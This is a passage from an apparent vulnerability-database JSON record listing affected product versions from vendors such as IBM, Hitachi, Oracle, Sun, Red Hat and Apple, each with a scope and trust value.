"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise software development kit sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "cosminexus application server standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.10" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.21" }, { "model": "cosminexus application server version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "cosminexus studio version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus studio version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "cosminexus client version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "websphere business services fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "cosminexus studio version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere business services fabric for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "rational requisitepro", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.13" }, { "model": "lotus domino 8.5.1fp5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.04" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus client version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus client version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere process server hypervisor edition for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "cosminexus developer professional version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "cosminexus developer standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "cosminexus application server enterprise version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "cosminexus application server enterprise version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere real time sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "jrockit r28.2.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus developer standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "i5/os v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cosminexus application server version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server enterprise version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus application server enterprise version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.41" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "cosminexus developer light version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "jrockit r27.7.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "cosminexus application server standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus application server standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.32" }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.20" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.25" }, { "model": "os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2013-005" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus developer version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.25" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "cosminexus application server standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "rational requisitepro", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.10" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "infosphere data replication dashboard 10.2.1.0-b351", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.43" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus domino 8.5fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.143" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.0" }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "cosminexus application server enterprise version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.14" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", 